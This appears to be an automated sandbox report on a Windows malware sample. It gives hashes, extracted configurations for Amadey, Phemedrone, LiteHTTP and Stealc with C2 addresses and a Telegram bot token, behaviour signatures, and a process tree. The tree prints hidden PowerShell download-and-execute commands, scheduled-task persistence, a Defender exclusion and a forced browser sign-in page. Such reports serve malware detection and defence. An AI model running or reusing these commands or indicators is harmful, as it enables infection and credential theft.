Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    05/03/2025, 17:05

General

  • Target

    c1a431d9eeca3c834b656a17dd543835020a9a90a6e5fd28d947dfd058d36e67.exe

  • Size

    938KB

  • MD5

    49b60f16af6a6028755c86cad74bb4ee

  • SHA1

    a94d538bebbbcf138c9116f5201009ae14d9c773

  • SHA256

    c1a431d9eeca3c834b656a17dd543835020a9a90a6e5fd28d947dfd058d36e67

  • SHA512

    dd120b906b034e837c1ede550f5b6d9afdb045ba50aef3cff87473cccd96b51827b2477e3fcb1b8658c5926adb2deaa0f26706dc30f97a6b9fb841f46ff2d314

  • SSDEEP

    24576:VqDEvCTbMWu7rQYlBQcBiT6rprG8a0su:VTvC/MTQYxsWR7a0s

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

phemedrone

C2

https://api.telegram.org/bot8073216408:AAGdXWcCmxBIngZx-Z502Gat9NRWpLvPTxU/sendDocument

Extracted

Family

litehttp

Version

v1.0.9

C2

http://185.208.156.162/page.php

Attributes
  • key

    v1d6kd29g85cm8jp4pv8tvflvg303gbl

Extracted

Family

stealc

Botnet

trump

C2

http://45.93.20.28

Attributes
  • url_path

    /85a1cacf11314eb8.php

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Detects Healer an antivirus disabler dropper 2 IoCs
  • GCleaner

    GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.

  • Gcleaner family
  • Healer

    Healer an antivirus disabler dropper.

  • Healer family
  • LiteHTTP

    LiteHTTP is an open-source bot written in C#.

  • Litehttp family
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
  • Phemedrone

    An information and wallet stealer written in C#.

  • Phemedrone family
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 12 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

    Using powershell.exe command.

  • Downloads MZ/PE file 20 IoCs
  • .NET Reactor proctector 2 IoCs

    Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

  • Checks BIOS information in registry 2 TTPs 24 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 30 IoCs
  • Identifies Wine through registry keys 2 TTPs 12 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 64 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 7 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • AutoIT Executable 2 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 12 IoCs
  • Suspicious use of SetThreadContext 6 IoCs
  • Drops file in Windows directory 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 7 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 49 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Kills process with taskkill 5 IoCs
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies registry class 1 IoCs
  • Modifies system certificate store 2 TTPs 5 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 19 IoCs
  • Suspicious use of FindShellTrayWindow 21 IoCs
  • Suspicious use of SendNotifyMessage 19 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\c1a431d9eeca3c834b656a17dd543835020a9a90a6e5fd28d947dfd058d36e67.exe
    "C:\Users\Admin\AppData\Local\Temp\c1a431d9eeca3c834b656a17dd543835020a9a90a6e5fd28d947dfd058d36e67.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:2964
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks /create /tn 2Z1oFmaMcmS /tr "mshta C:\Users\Admin\AppData\Local\Temp\H5r7M8sf5.hta" /sc minute /mo 25 /ru "Admin" /f
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2908
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /create /tn 2Z1oFmaMcmS /tr "mshta C:\Users\Admin\AppData\Local\Temp\H5r7M8sf5.hta" /sc minute /mo 25 /ru "Admin" /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Scheduled Task/Job: Scheduled Task
        PID:2948
    • C:\Windows\SysWOW64\mshta.exe
      mshta C:\Users\Admin\AppData\Local\Temp\H5r7M8sf5.hta
      2⤵
      • System Location Discovery: System Language Discovery
      • Modifies Internet Explorer settings
      • Suspicious use of WriteProcessMemory
      PID:2796
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'ZLDH8CNOMNYHEPT2JKSW6KXTBSAMKUBD.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Downloads MZ/PE file
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2900
        • C:\Users\Admin\AppData\Local\TempZLDH8CNOMNYHEPT2JKSW6KXTBSAMKUBD.EXE
          "C:\Users\Admin\AppData\Local\TempZLDH8CNOMNYHEPT2JKSW6KXTBSAMKUBD.EXE"
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Loads dropped DLL
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Drops file in Windows directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of WriteProcessMemory
          PID:1084
          • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
            "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
            5⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Downloads MZ/PE file
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Loads dropped DLL
            • Adds Run key to start application
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:2932
            • C:\Users\Admin\AppData\Local\Temp\10104610101\2c6cf18ecd.exe
              "C:\Users\Admin\AppData\Local\Temp\10104610101\2c6cf18ecd.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SendNotifyMessage
              • Suspicious use of WriteProcessMemory
              PID:2576
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c schtasks /create /tn M50Pbmap6ee /tr "mshta C:\Users\Admin\AppData\Local\Temp\QRzpfZIi6.hta" /sc minute /mo 25 /ru "Admin" /f
                7⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:3032
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /create /tn M50Pbmap6ee /tr "mshta C:\Users\Admin\AppData\Local\Temp\QRzpfZIi6.hta" /sc minute /mo 25 /ru "Admin" /f
                  8⤵
                  • System Location Discovery: System Language Discovery
                  • Scheduled Task/Job: Scheduled Task
                  PID:2344
              • C:\Windows\SysWOW64\mshta.exe
                mshta C:\Users\Admin\AppData\Local\Temp\QRzpfZIi6.hta
                7⤵
                • System Location Discovery: System Language Discovery
                • Modifies Internet Explorer settings
                • Suspicious use of WriteProcessMemory
                PID:3028
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'VR4A1BVRS7T8X2UCK05I7H3PSW1HIWCB.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                  8⤵
                  • Blocklisted process makes network request
                  • Command and Scripting Interpreter: PowerShell
                  • Downloads MZ/PE file
                  • Loads dropped DLL
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:1952
                  • C:\Users\Admin\AppData\Local\TempVR4A1BVRS7T8X2UCK05I7H3PSW1HIWCB.EXE
                    "C:\Users\Admin\AppData\Local\TempVR4A1BVRS7T8X2UCK05I7H3PSW1HIWCB.EXE"
                    9⤵
                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                    • Checks BIOS information in registry
                    • Executes dropped EXE
                    • Identifies Wine through registry keys
                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                    • Suspicious behavior: EnumeratesProcesses
                    PID:1356
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c ""C:\Users\Admin\AppData\Local\Temp\10104620121\am_no.cmd" "
              6⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:1668
              • C:\Windows\SysWOW64\timeout.exe
                timeout /t 2
                7⤵
                • System Location Discovery: System Language Discovery
                • Delays execution with timeout.exe
                PID:1808
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                7⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:2432
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                  8⤵
                  • Command and Scripting Interpreter: PowerShell
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2276
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                7⤵
                • System Location Discovery: System Language Discovery
                PID:1748
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                  8⤵
                  • Command and Scripting Interpreter: PowerShell
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2544
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                7⤵
                • System Location Discovery: System Language Discovery
                PID:2540
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                  8⤵
                  • Command and Scripting Interpreter: PowerShell
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1284
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /create /tn "bWOarmajkm4" /tr "mshta \"C:\Temp\hubnHaAeM.hta\"" /sc minute /mo 25 /ru "Admin" /f
                7⤵
                • System Location Discovery: System Language Discovery
                • Scheduled Task/Job: Scheduled Task
                PID:2892
              • C:\Windows\SysWOW64\mshta.exe
                mshta "C:\Temp\hubnHaAeM.hta"
                7⤵
                • System Location Discovery: System Language Discovery
                • Modifies Internet Explorer settings
                PID:2644
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                  8⤵
                  • Blocklisted process makes network request
                  • Command and Scripting Interpreter: PowerShell
                  • Downloads MZ/PE file
                  • Loads dropped DLL
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3048
                  • C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
                    "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
                    9⤵
                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                    • Checks BIOS information in registry
                    • Executes dropped EXE
                    • Identifies Wine through registry keys
                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                    • Suspicious behavior: EnumeratesProcesses
                    PID:2604
            • C:\Users\Admin\AppData\Local\Temp\10104820101\d7fb9061a7.exe
              "C:\Users\Admin\AppData\Local\Temp\10104820101\d7fb9061a7.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:548
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 548 -s 1232
                7⤵
                • Loads dropped DLL
                • Program crash
                PID:1832
            • C:\Users\Admin\AppData\Local\Temp\10104830101\pDZWk1j.exe
              "C:\Users\Admin\AppData\Local\Temp\10104830101\pDZWk1j.exe"
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              PID:1908
              • C:\Users\Admin\AppData\Local\Temp\10104830101\pDZWk1j.exe
                "C:\Users\Admin\AppData\Local\Temp\10104830101\pDZWk1j.exe"
                7⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • System Location Discovery: System Language Discovery
                PID:1880
                • C:\Users\Admin\AppData\Roaming\SwffjsQHJy.exe
                  "C:\Users\Admin\AppData\Roaming\SwffjsQHJy.exe"
                  8⤵
                  • Executes dropped EXE
                  PID:1712
                • C:\Users\Admin\AppData\Roaming\ihu1EZOyUL.exe
                  "C:\Users\Admin\AppData\Roaming\ihu1EZOyUL.exe"
                  8⤵
                  • Executes dropped EXE
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1996
                  • C:\Windows\system32\WerFault.exe
                    C:\Windows\system32\WerFault.exe -u -p 1996 -s 1592
                    9⤵
                      PID:2880
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 1908 -s 500
                  7⤵
                  • Loads dropped DLL
                  • Program crash
                  PID:1564
              • C:\Users\Admin\AppData\Local\Temp\10104850101\cc9ac2900b.exe
                "C:\Users\Admin\AppData\Local\Temp\10104850101\cc9ac2900b.exe"
                6⤵
                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                • Checks BIOS information in registry
                • Executes dropped EXE
                • Identifies Wine through registry keys
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • Suspicious use of SetThreadContext
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                PID:2736
                • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                  "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                  7⤵
                  • Downloads MZ/PE file
                  • Loads dropped DLL
                  • System Location Discovery: System Language Discovery
                  PID:1188
              • C:\Users\Admin\AppData\Local\Temp\10104860101\c8386e5aaa.exe
                "C:\Users\Admin\AppData\Local\Temp\10104860101\c8386e5aaa.exe"
                6⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of SetThreadContext
                • System Location Discovery: System Language Discovery
                • Suspicious use of AdjustPrivilegeToken
                PID:1048
                • C:\Users\Admin\AppData\Local\Temp\10104860101\c8386e5aaa.exe
                  "C:\Users\Admin\AppData\Local\Temp\10104860101\c8386e5aaa.exe"
                  7⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  PID:840
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 840 -s 1016
                    8⤵
                    • Loads dropped DLL
                    • Program crash
                    PID:1592
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 1048 -s 508
                  7⤵
                  • Loads dropped DLL
                  • Program crash
                  PID:2412
              • C:\Users\Admin\AppData\Local\Temp\10104870101\9bdac42c90.exe
                "C:\Users\Admin\AppData\Local\Temp\10104870101\9bdac42c90.exe"
                6⤵
                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                • Checks BIOS information in registry
                • Executes dropped EXE
                • Identifies Wine through registry keys
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • Suspicious use of SetThreadContext
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                PID:916
                • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                  "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                  7⤵
                  • Downloads MZ/PE file
                  • Loads dropped DLL
                  • System Location Discovery: System Language Discovery
                  PID:2652
              • C:\Users\Admin\AppData\Local\Temp\10104880101\0587d4f94b.exe
                "C:\Users\Admin\AppData\Local\Temp\10104880101\0587d4f94b.exe"
                6⤵
                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                • Checks BIOS information in registry
                • Executes dropped EXE
                • Identifies Wine through registry keys
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • System Location Discovery: System Language Discovery
                • Modifies system certificate store
                • Suspicious behavior: EnumeratesProcesses
                PID:1832
              • C:\Users\Admin\AppData\Local\Temp\10104890101\60e13ce159.exe
                "C:\Users\Admin\AppData\Local\Temp\10104890101\60e13ce159.exe"
                6⤵
                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                • Checks BIOS information in registry
                • Executes dropped EXE
                • Identifies Wine through registry keys
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • System Location Discovery: System Language Discovery
                • Modifies system certificate store
                • Suspicious behavior: EnumeratesProcesses
                PID:2636
              • C:\Users\Admin\AppData\Local\Temp\10104900101\ce4pMzk.exe
                "C:\Users\Admin\AppData\Local\Temp\10104900101\ce4pMzk.exe"
                6⤵
                • Downloads MZ/PE file
                • Executes dropped EXE
                • Loads dropped DLL
                • Adds Run key to start application
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:2888
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Local\Caches\yV9ypTrU\Anubis.exe""
                  7⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2784
                • C:\Users\Admin\AppData\Roaming\mzwkecO.exe
                  "C:\Users\Admin\AppData\Roaming\mzwkecO.exe"
                  7⤵
                  • Executes dropped EXE
                  PID:3124
              • C:\Users\Admin\AppData\Local\Temp\10104920101\c1c4c6ac25.exe
                "C:\Users\Admin\AppData\Local\Temp\10104920101\c1c4c6ac25.exe"
                6⤵
                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                • Checks BIOS information in registry
                • Executes dropped EXE
                • Identifies Wine through registry keys
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                PID:1564
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 1564 -s 1200
                  7⤵
                  • Loads dropped DLL
                  • Program crash
                  PID:3060
              • C:\Users\Admin\AppData\Local\Temp\10104930101\7cb8f1b366.exe
                "C:\Users\Admin\AppData\Local\Temp\10104930101\7cb8f1b366.exe"
                6⤵
                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                • Checks BIOS information in registry
                • Executes dropped EXE
                • Identifies Wine through registry keys
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                PID:2160
              • C:\Users\Admin\AppData\Local\Temp\10104940101\b35c8a7182.exe
                "C:\Users\Admin\AppData\Local\Temp\10104940101\b35c8a7182.exe"
                6⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of FindShellTrayWindow
                • Suspicious use of SendNotifyMessage
                PID:1832
                • C:\Windows\SysWOW64\taskkill.exe
                  taskkill /F /IM firefox.exe /T
                  7⤵
                  • System Location Discovery: System Language Discovery
                  • Kills process with taskkill
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2740
                • C:\Windows\SysWOW64\taskkill.exe
                  taskkill /F /IM chrome.exe /T
                  7⤵
                  • System Location Discovery: System Language Discovery
                  • Kills process with taskkill
                  • Suspicious use of AdjustPrivilegeToken
                  PID:580
                • C:\Windows\SysWOW64\taskkill.exe
                  taskkill /F /IM msedge.exe /T
                  7⤵
                  • System Location Discovery: System Language Discovery
                  • Kills process with taskkill
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1880
                • C:\Windows\SysWOW64\taskkill.exe
                  taskkill /F /IM opera.exe /T
                  7⤵
                  • System Location Discovery: System Language Discovery
                  • Kills process with taskkill
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1908
                • C:\Windows\SysWOW64\taskkill.exe
                  taskkill /F /IM brave.exe /T
                  7⤵
                  • System Location Discovery: System Language Discovery
                  • Kills process with taskkill
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2700
                • C:\Program Files\Mozilla Firefox\firefox.exe
                  "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                  7⤵
                    PID:2108
                    • C:\Program Files\Mozilla Firefox\firefox.exe
                      "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                      8⤵
                      • Checks processor information in registry
                      • Modifies registry class
                      • Suspicious use of AdjustPrivilegeToken
                      • Suspicious use of FindShellTrayWindow
                      • Suspicious use of SendNotifyMessage
                      PID:2272
                      • C:\Program Files\Mozilla Firefox\firefox.exe
                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2272.0.1856920404\1737087836" -parentBuildID 20221007134813 -prefsHandle 1216 -prefMapHandle 1208 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {f60bff9b-f662-4f28-8912-f8a6b50b1f66} 2272 "\\.\pipe\gecko-crash-server-pipe.2272" 1280 11ef3858 gpu
                        9⤵
                          PID:2000
                        • C:\Program Files\Mozilla Firefox\firefox.exe
                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2272.1.1718862442\10946841" -parentBuildID 20221007134813 -prefsHandle 1484 -prefMapHandle 1480 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {dacc99ea-eb32-4ab7-8238-097b573dd4a0} 2272 "\\.\pipe\gecko-crash-server-pipe.2272" 1496 d74e58 socket
                          9⤵
                            PID:1964
                          • C:\Program Files\Mozilla Firefox\firefox.exe
                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2272.2.1900318187\659413493" -childID 1 -isForBrowser -prefsHandle 1992 -prefMapHandle 2008 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 868 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {d5168e08-10f1-4472-93c4-35f275364dc5} 2272 "\\.\pipe\gecko-crash-server-pipe.2272" 1720 11e5a558 tab
                            9⤵
                              PID:1312
                            • C:\Program Files\Mozilla Firefox\firefox.exe
                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2272.3.1514708554\201293305" -childID 2 -isForBrowser -prefsHandle 2924 -prefMapHandle 2920 -prefsLen 26216 -prefMapSize 233444 -jsInitHandle 868 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {10215be6-6caa-4a1f-8fa3-cac15faa6e01} 2272 "\\.\pipe\gecko-crash-server-pipe.2272" 2936 d64b58 tab
                              9⤵
                                PID:2680
                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2272.4.2016096161\601390929" -childID 3 -isForBrowser -prefsHandle 3784 -prefMapHandle 3644 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 868 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {18241ec4-4d26-4f3f-b9cd-13459d7c5eaa} 2272 "\\.\pipe\gecko-crash-server-pipe.2272" 3796 1a3cb158 tab
                                9⤵
                                  PID:2828
                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2272.5.817658092\24534104" -childID 4 -isForBrowser -prefsHandle 3908 -prefMapHandle 3912 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 868 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {7b6c2081-5398-41fd-8398-ccb654364e8c} 2272 "\\.\pipe\gecko-crash-server-pipe.2272" 3896 2227cf58 tab
                                  9⤵
                                    PID:2652
                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2272.6.1847443226\1554145026" -childID 5 -isForBrowser -prefsHandle 4072 -prefMapHandle 4076 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 868 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {411443b8-fc2c-412c-86de-8c37498ff2fa} 2272 "\\.\pipe\gecko-crash-server-pipe.2272" 4060 222a0a58 tab
                                    9⤵
                                      PID:3020
                              • C:\Users\Admin\AppData\Local\Temp\10104950101\a08064d4d7.exe
                                "C:\Users\Admin\AppData\Local\Temp\10104950101\a08064d4d7.exe"
                                6⤵
                                • Modifies Windows Defender DisableAntiSpyware settings
                                • Modifies Windows Defender Real-time Protection settings
                                • Modifies Windows Defender TamperProtection settings
                                • Modifies Windows Defender notification settings
                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                • Checks BIOS information in registry
                                • Executes dropped EXE
                                • Identifies Wine through registry keys
                                • Windows security modification
                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                • System Location Discovery: System Language Discovery
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1520
                              • C:\Users\Admin\AppData\Local\Temp\10104960101\joblam.exe
                                "C:\Users\Admin\AppData\Local\Temp\10104960101\joblam.exe"
                                6⤵
                                • Executes dropped EXE
                                PID:3384
